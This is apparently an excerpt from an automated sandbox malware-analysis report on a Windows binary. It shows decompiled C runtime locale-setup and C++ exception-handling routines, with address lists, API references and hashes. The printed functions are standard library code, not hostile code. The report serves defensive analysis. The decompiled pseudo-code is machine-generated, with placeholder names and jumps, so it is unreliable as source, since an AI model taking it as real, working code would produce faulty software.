                    • Opcode ID: 31088af05e08a50a062e352662d32d304f9db3ef95a0c0b51c76f7e2d528dafe
                    • Instruction ID: 9ebaacd92223f7de4efb172a6879930719cc3c5db8172e0a30180bb5fcdef24f
                    • Opcode Fuzzy Hash: 31088af05e08a50a062e352662d32d304f9db3ef95a0c0b51c76f7e2d528dafe
                    • Instruction Fuzzy Hash: CC0169B17E121C7EF2247B75AC8BFBB225CDFC6B05F104112F702EA0D1CAA599028978
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 002867DB Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E002867DB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_t31 = __ebx;
				_push(8);
				_push(0x292108);
				E00283D50(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x290d30;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x294680;
				E00286FB4(__ebx, 1, 0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E0028687D();
				E00286FB4(_t31, 1, 0xc);
				 *(_t40 - 4) = 1;
				_t15 = _t40 + 0xc; // 0x282e0d
				_t26 =  *_t15;
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x294de8; // 0x294d10
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00288D2A( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E00283D95(E00286886());
			}







                    0x002867db
                    0x002867db
                    0x002867dd
                    0x002867e2
                    0x002867ec
                    0x002867f2
                    0x002867f5
                    0x002867fc
                    0x00286803
                    0x00286806
                    0x00286809
                    0x00286810
                    0x00286817
                    0x00286820
                    0x00286826
                    0x0028682d
                    0x00286833
                    0x0028683a
                    0x00286841
                    0x00286847
                    0x0028684a
                    0x0028684a
                    0x0028684d
                    0x00286852
                    0x00286854
                    0x00286859
                    0x00286859
                    0x0028685f
                    0x00286865
                    0x00286876

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00292108,00000008,002868E3,00000000,00000000,?,002840A2,.(,?,?,?,00282E0D,00000000,?), ref: 002867EC
                    • __lock.LIBCMT ref: 00286820
                      • Part of subcall function 00286FB4: __mtinitlocknum.LIBCMT ref: 00286FCA
                      • Part of subcall function 00286FB4: __amsg_exit.LIBCMT ref: 00286FD6
                      • Part of subcall function 00286FB4: EnterCriticalSection.KERNEL32(00000000,00000000,?,00286825,0000000D,?,002840A2,.(,?,?,?,00282E0D,00000000,?), ref: 00286FDE
                    • InterlockedIncrement.KERNEL32(?), ref: 0028682D
                    • __lock.LIBCMT ref: 00286841
                    • ___addlocaleref.LIBCMT ref: 0028685F
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: .($0)$KERNEL32.DLL
                    • API String ID: 637971194-3816618702
                    • Opcode ID: 07016d170939545566bcf6ee9e844bb9e7e507ad9d215c00650ebb8248762096
                    • Instruction ID: 897f178debcedfd16e2537ee1b020bdec4b7f6cfe0dc2366be9cfbc5eb196a45
                    • Opcode Fuzzy Hash: 07016d170939545566bcf6ee9e844bb9e7e507ad9d215c00650ebb8248762096
                    • Instruction Fuzzy Hash: D201AD75412700EFD720BF65E809709FBE0AF10320F10490EE49A577E0CBB0AA64CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004038EB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E004038EB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E004044A9(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E0040579A(_t270, _t275, _t296, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E004029B3(_t271, _t275, _t296, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E004029B3(_t271, _t275, _t296, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00402E31(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00402D64(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E0040386B(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E0040579A(_t271, _t275, _t296, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E004029B3(_t270, _t275, _t296, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E004029B3(_t270, _t275, _t296, 0) + 0x10);
								_t259 = E004029B3(_t270, _t275, _t296, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E00402D64(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E0040386B(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0040263C(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E004029B3(_t270, _t275, _t296, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E0040436A(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
																	_t237 = E004029B3(_t270, _t275, _t296, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E004029B3(_t270, _t275, _t296, _t315) + 0x1c));
										_t264 = E004029B3(_t270, _t275, _t296, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E0040436A(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E004056DE(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E00403FC6( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4158ac) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E0040263C(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E00403F71( &_v64);
											E0040225B( &_v64, 0x413554);
											L64:
											 *(E004029B3(_t270, _t275, _t296, _t315) + 0x10) = _t270;
											_t231 = E004029B3(_t270, _t275, _t296, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E00402F57(_t275, _t315, _t270);
											E0040426A(_a8, _a16, _t301);
											_t234 = E00404427(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E004041E1(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}






















































































                    0x004038eb
                    0x004038f2
                    0x004038f4
                    0x004038fd
                    0x00403903
                    0x0040390b
                    0x0040390d
                    0x00403910
                    0x00403916
                    0x00403c8a
                    0x00403c8a
                    0x00403c8f
                    0x00403c91
                    0x00403c93
                    0x00403c96
                    0x00403c97
                    0x00403c9a
                    0x00403ca0
                    0x00403dbf
                    0x00403ca6
                    0x00403ca6
                    0x00403ca7
                    0x00403ca8
                    0x00403caf
                    0x00403cb2
                    0x00403cb5
                    0x00403cbb
                    0x00403cbd
                    0x00403cc2
                    0x00403cc5
                    0x00403cc7
                    0x00403ccd
                    0x00403ccf
                    0x00403cd5
                    0x00403cea
                    0x00403cef
                    0x00403cf2
                    0x00403cf4
                    0x00403dbb
                    0x00000000
                    0x00403dbc
                    0x00403cf4
                    0x00403cd5
                    0x00403ccd
                    0x00403cc5
                    0x00403cfa
                    0x00403cfd
                    0x00403d00
                    0x00403d03
                    0x00403d06
                    0x00403d0c
                    0x00403d1e
                    0x00403d23
                    0x00403d26
                    0x00403d29
                    0x00403d2c
                    0x00403d2f
                    0x00403d32
                    0x00403d35
                    0x00000000
                    0x00000000
                    0x00403d3b
                    0x00403d3b
                    0x00403d3e
                    0x00403d41
                    0x00403d50
                    0x00403d51
                    0x00403d51
                    0x00403d53
                    0x00403d56
                    0x00000000
                    0x00000000
                    0x00403d58
                    0x00403d5b
                    0x00000000
                    0x00000000
                    0x00403d69
                    0x00403d6b
                    0x00403d6e
                    0x00403d70
                    0x00403d78
                    0x00403d78
                    0x00403d7b
                    0x00403d7d
                    0x00403d7f
                    0x00403d9b
                    0x00403da0
                    0x00403da3
                    0x00403da3
                    0x00000000
                    0x00403d7b
                    0x00403d72
                    0x00403d76
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403da6
                    0x00403da9
                    0x00403daa
                    0x00403dad
                    0x00403db0
                    0x00403db3
                    0x00403db6
                    0x00403db6
                    0x00000000
                    0x00403d41
                    0x00403dc0
                    0x00403dc5
                    0x00403dc6
                    0x00403dc9
                    0x00403dcc
                    0x00403dcd
                    0x00403dce
                    0x00403dcf
                    0x00403dd2
                    0x00403dd4
                    0x00403e4c
                    0x00403e4e
                    0x00403e4e
                    0x00403dd6
                    0x00403dd6
                    0x00403dd9
                    0x00403ddc
                    0x00000000
                    0x00403dde
                    0x00403dde
                    0x00403de1
                    0x00403de4
                    0x00403deb
                    0x00403deb
                    0x00403dee
                    0x00403df0
                    0x00403df2
                    0x00403e24
                    0x00403e24
                    0x00403e27
                    0x00403e2e
                    0x00403e2e
                    0x00403e31
                    0x00403e34
                    0x00403e3b
                    0x00403e3b
                    0x00403e3e
                    0x00403e45
                    0x00403e47
                    0x00403e47
                    0x00403e40
                    0x00403e40
                    0x00403e43
                    0x00000000
                    0x00000000
                    0x00403e43
                    0x00403e36
                    0x00403e36
                    0x00403e39
                    0x00000000
                    0x00000000
                    0x00403e39
                    0x00403e29
                    0x00403e29
                    0x00403e2c
                    0x00000000
                    0x00000000
                    0x00403e2c
                    0x00403e48
                    0x00403df4
                    0x00403df4
                    0x00403df4
                    0x00403df7
                    0x00403df7
                    0x00403df9
                    0x00403dfb
                    0x00000000
                    0x00000000
                    0x00403dfd
                    0x00403dff
                    0x00403e13
                    0x00403e13
                    0x00403e01
                    0x00403e01
                    0x00403e04
                    0x00403e07
                    0x00000000
                    0x00403e09
                    0x00403e09
                    0x00403e0c
                    0x00403e0f
                    0x00403e11
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e11
                    0x00403e07
                    0x00403e1c
                    0x00403e1c
                    0x00403e1e
                    0x00000000
                    0x00403e20
                    0x00403e20
                    0x00403e20
                    0x00000000
                    0x00403e1e
                    0x00403e17
                    0x00403e19
                    0x00403e19
                    0x00000000
                    0x00403e19
                    0x00403de6
                    0x00403de6
                    0x00403de9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403de9
                    0x00403de4
                    0x00403ddc
                    0x00403e4f
                    0x00403e53
                    0x00403e53
                    0x00403925
                    0x00403925
                    0x0040392e
                    0x00403a2b
                    0x00403a2b
                    0x00403a2e
                    0x00000000
                    0x0040395d
                    0x0040395d
                    0x00403962
                    0x00000000
                    0x00403968
                    0x00403968
                    0x00403970
                    0x00403c24
                    0x00403c28
                    0x00403976
                    0x0040397b
                    0x0040397e
                    0x00403983
                    0x0040398a
                    0x0040398f
                    0x00000000
                    0x004039c7
                    0x004039cf
                    0x00403a33
                    0x00403a33
                    0x00403a36
                    0x00403a39
                    0x00403a3b
                    0x00403a3e
                    0x00403a41
                    0x00403a47
                    0x00403bf3
                    0x00403bf3
                    0x00403bf6
                    0x00000000
                    0x00403bf8
                    0x00403bf8
                    0x00403bfb
                    0x00000000
                    0x00403c01
                    0x00403c01
                    0x00403c04
                    0x00403c07
                    0x00403c08
                    0x00403c09
                    0x00403c0c
                    0x00403c0d
                    0x00403c10
                    0x00403c11
                    0x00403c16
                    0x00000000
                    0x00403c16
                    0x00403bfb
                    0x00403a4d
                    0x00403a4d
                    0x00403a51
                    0x00000000
                    0x00403a57
                    0x00403a57
                    0x00403a5e
                    0x00403a76
                    0x00403a76
                    0x00403a79
                    0x00403a7c
                    0x00403a82
                    0x00403a92
                    0x00403a97
                    0x00403a9a
                    0x00403a9d
                    0x00403aa0
                    0x00403aa3
                    0x00403aa6
                    0x00403aa9
                    0x00403aaf
                    0x00403aaf
                    0x00403ab2
                    0x00403ab5
                    0x00403ac4
                    0x00403ac5
                    0x00403ac5
                    0x00403ac7
                    0x00403aca
                    0x00403ad0
                    0x00403ad3
                    0x00403ad9
                    0x00403adb
                    0x00403ade
                    0x00403ae1
                    0x00403ae7
                    0x00403aea
                    0x00403aef
                    0x00403aef
                    0x00403af2
                    0x00403af5
                    0x00403af8
                    0x00403afb
                    0x00403afe
                    0x00403b03
                    0x00403b04
                    0x00403b05
                    0x00403b06
                    0x00403b07
                    0x00403b0a
                    0x00403b0d
                    0x00403b0f
                    0x00000000
                    0x00403b11
                    0x00403b11
                    0x00403b11
                    0x00403b12
                    0x00403b14
                    0x00403b17
                    0x00403b18
                    0x00403b1d
                    0x00403b20
                    0x00403b22
                    0x00000000
                    0x00000000
                    0x00403b24
                    0x00403b27
                    0x00403b28
                    0x00403b2b
                    0x00403b2d
                    0x00000000
                    0x00403b2f
                    0x00403b2f
                    0x00403b32
                    0x00000000
                    0x00403b32
                    0x00000000
                    0x00403b2d
                    0x00403b46
                    0x00403b4c
                    0x00403b69
                    0x00403b6e
                    0x00403b6e
                    0x00403b71
                    0x00403b71
                    0x00000000
                    0x00403b35
                    0x00403b35
                    0x00403b36
                    0x00403b39
                    0x00403b3c
                    0x00403b3f
                    0x00403b3f
                    0x00000000
                    0x00403b44
                    0x00403ae1
                    0x00403ad3
                    0x00403b74
                    0x00403b77
                    0x00403b78
                    0x00403b7b
                    0x00403b7e
                    0x00403b81
                    0x00403b84
                    0x00403b84
                    0x00403b8d
                    0x00403b90
                    0x00403b90
                    0x00403aa9
                    0x00403b93
                    0x00403b97
                    0x00403b99
                    0x00403b9c
                    0x00403ba2
                    0x00403ba2
                    0x00403baa
                    0x00403baf
                    0x00403c19
                    0x00403c19
                    0x00403c1e
                    0x00403c22
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403bb1
                    0x00403bb4
                    0x00403bb7
                    0x00403bbb
                    0x00403bc9
                    0x00403bcb
                    0x00403be2
                    0x00403be6
                    0x00403bec
                    0x00403bed
                    0x00403bef
                    0x00000000
                    0x00403bf1
                    0x00000000
                    0x00403bf1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403bbd
                    0x00403bbd
                    0x00403bbf
                    0x00000000
                    0x00403bc1
                    0x00403bc1
                    0x00403bc5
                    0x00000000
                    0x00403bc7
                    0x00403bcd
                    0x00403bd2
                    0x00403bd5
                    0x00403bda
                    0x00403bdd
                    0x00000000
                    0x00403bdd
                    0x00403bc5
                    0x00403bbf
                    0x00403bbb
                    0x00403a60
                    0x00403a60
                    0x00403a67
                    0x00000000
                    0x00403a69
                    0x00403a69
                    0x00403a70
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403a70
                    0x00403a67
                    0x00403a5e
                    0x00403a51
                    0x004039d1
                    0x004039d9
                    0x004039dc
                    0x004039e1
                    0x004039e5
                    0x004039e8
                    0x004039ee
                    0x004039f1
                    0x00000000
                    0x004039f3
                    0x004039f3
                    0x004039f6
                    0x004039f8
                    0x00403c29
                    0x00403c29
                    0x00000000
                    0x004039fe
                    0x00403a06
                    0x00403a11
                    0x00000000
                    0x00000000
                    0x00403a1a
                    0x00403a1d
                    0x00403a1e
                    0x00403a21
                    0x00403a23
                    0x00000000
                    0x00403a29
                    0x00000000
                    0x00403a29
                    0x00000000
                    0x00403a23
                    0x004039fe
                    0x00403c2e
                    0x00403c2e
                    0x00403c30
                    0x00403c31
                    0x00403c38
                    0x00403c3b
                    0x00403c49
                    0x00403c4e
                    0x00403c53
                    0x00403c56
                    0x00403c5b
                    0x00403c5e
                    0x00403c61
                    0x00403c63
                    0x00403c65
                    0x00403c65
                    0x00403c6a
                    0x00403c76
                    0x00403c7c
                    0x00403c81
                    0x00403c84
                    0x00403c85
                    0x00000000
                    0x00403c85
                    0x004039f1
                    0x004039cf
                    0x0040398f
                    0x00403970
                    0x00403962
                    0x0040392e

                    APIs
                    • type_info::operator==.LIBVCRUNTIME ref: 00403A0A
                    • ___TypeMatch.LIBVCRUNTIME ref: 00403B18
                    • _UnwindNestedFrames.LIBCMT ref: 00403C6A
                    • CallUnexpected.LIBVCRUNTIME ref: 00403C85
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
